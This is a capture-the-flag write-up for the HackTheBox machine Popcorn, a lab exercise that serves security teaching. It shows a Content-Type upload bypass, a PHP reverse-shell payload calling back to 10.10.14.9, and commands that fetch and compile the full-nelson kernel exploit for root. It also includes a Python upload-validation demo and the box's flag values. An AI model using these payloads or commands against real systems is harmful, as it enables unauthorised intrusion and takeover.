
HackTheBox Popcorn

Writeup for HackTheBox Popcorn

Machine Synopsis

Key Exploitation Techniques:

  • Web File Upload Vulnerability (Content-Type bypass)
  • Linux Kernel Privilege Escalation (full-nelson - CVE-2010-4258, CVE-2010-3849, CVE-2010-3850)

Enumeration

$ nmap -sC -sV -A 10.10.10.6

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)

[screenshot: website]

gobuster revealed a /torrent directory; the torrent application hosted there offers user registration and login.

$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index                (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47032]
/torrent              (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename               (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/] 
...

[screenshot: torrent homepage]

[screenshot: sign-up page]

Exploitation

Initial Access (www-data)

After creating and logging into a new account, an upload page was accessible. Initial attempts to upload a PHP reverse shell were met with a “This is not a valid torrent file” error.

[screenshot: torrent upload page]

[screenshot: uploading a torrent]

A valid torrent file was uploaded, revealing an option to “change screenshot.”

[screenshot: edit torrent page]

Attempting to upload a PHP reverse shell as a screenshot resulted in an "invalid file" error, so the server performs some check on the uploaded file's type.

The upload request was intercepted in a proxy, and the Content-Type header of the file part was changed from application/x-php to image/png while the .php filename was left untouched. This bypassed the validation: the check trusts the client-supplied MIME type rather than the extension or the file contents, so the PHP shell was stored with its .php extension intact, and Apache executes it when the file is requested.

# Modified HTTP Request
...
Content-Type: image/png

<?php system("bash -i >& /dev/tcp/10.10.14.9/1234 <&1"); ?>

The server response confirmed the successful upload.
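As an added example (not code from the original writeup or from the torrent application on the box), the following Python script shows why the Content-Type swap works and what a validator that does not trust the client looks like. The application's real check is not shown on the page, so weak_check() is an assumed reconstruction of a server that accepts any part whose declared MIME type is an image; hardened_check() ignores the declared type and validates the extension and magic bytes instead. The multipart boundary, field name and sample payloads are constructed here.

```python
"""Added example: forging the per-part Content-Type in a multipart upload and
checking it against a weak and a hardened server-side validator.

Not code from the original writeup or from the torrent application;
weak_check() is an assumed reconstruction of a server that trusts the
client-supplied MIME type. All inputs below are constructed."""
import re

# Constructed sample payloads (not captured traffic).
PHP_SHELL = b'<?php system("bash -i >& /dev/tcp/10.10.14.9/1234 <&1"); ?>'
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # PNG signature plus padding

ALLOWED_MIME = {"image/png", "image/jpeg", "image/gif"}
# Extension allow-list with the magic bytes each format must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def build_multipart(boundary, field, filename, content_type, data):
    """Build the multipart/form-data body a browser (or Burp) sends.

    content_type is the per-part header under the attacker's control; the
    filename is sent verbatim too, so a .php extension survives the upload."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def parse_multipart(boundary, body):
    """Return (filename, declared content type, file bytes) for a single file part."""
    part = body.split(f"--{boundary}".encode())[1]
    part = part.removeprefix(b"\r\n").removesuffix(b"\r\n")
    headers, _, data = part.partition(b"\r\n\r\n")
    text = headers.decode()
    filename = re.search(r'filename="([^"]*)"', text).group(1)
    ctype = re.search(r"Content-Type:\s*(\S+)", text).group(1)
    return filename, ctype, data


def weak_check(filename, declared_type, data):
    """Assumed reconstruction of the bypassed check: believe the client."""
    return declared_type in ALLOWED_MIME


def hardened_check(filename, declared_type, data):
    """Ignore declared_type. Require exactly one allow-listed extension (so
    shell.php.png is rejected) and matching magic bytes in the content."""
    name = filename.lower()
    if "/" in name or "\\" in name or name.count(".") != 1:
        return False
    ext = name[name.rfind("."):]
    if ext not in MAGIC:
        return False
    return data.startswith(MAGIC[ext])


def upload_accepted(check, boundary, body):
    """Run a validator over a raw multipart body, as the server would."""
    return check(*parse_multipart(boundary, body))


if __name__ == "__main__":
    boundary = "----WebKitFormBoundaryExample"   # constructed
    forged = build_multipart(boundary, "screenshot", "exploit.php",
                             "image/png", PHP_SHELL)
    print("weak check accepts forged PHP upload:",
          upload_accepted(weak_check, boundary, forged))
    print("hardened check accepts it:",
          upload_accepted(hardened_check, boundary, forged))
```

Even with the hardened check, an upload handler should store the file under a server-generated name with the validated extension and serve the upload directory with script execution disabled, so a file that slips through a content check is still never run as PHP.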

[screenshot: upload directory listing]

A netcat listener was set up. The reverse shell was triggered by accessing the uploaded file (e.g., http://10.10.10.6/torrent/upload/exploit.php).

# Attacker machine: Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

A www-data shell was obtained.

connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae

Privilege Escalation

Linux Kernel Exploit

The kernel version 2.6.31-14-generic-pae was identified, the stock Ubuntu 9.10 kernel. Linux Exploit Suggester (les.sh) was copied to the target and run to find applicable local privilege escalation exploits.

$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2010-4258,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
...

The full-nelson.c exploit was fetched from the attacker's web server, compiled with the gcc present on the target, and executed. The kernel matches the exploit's tags exactly (Ubuntu 9.10, 2.6.31-14-generic), which is worth confirming before running any kernel exploit, since a failed attempt can crash the box.

$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson

Execution of full-nelson yielded a root shell.

id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478

The user.txt and root.txt flags were retrieved.

This post is licensed under CC BY 4.0 by the author.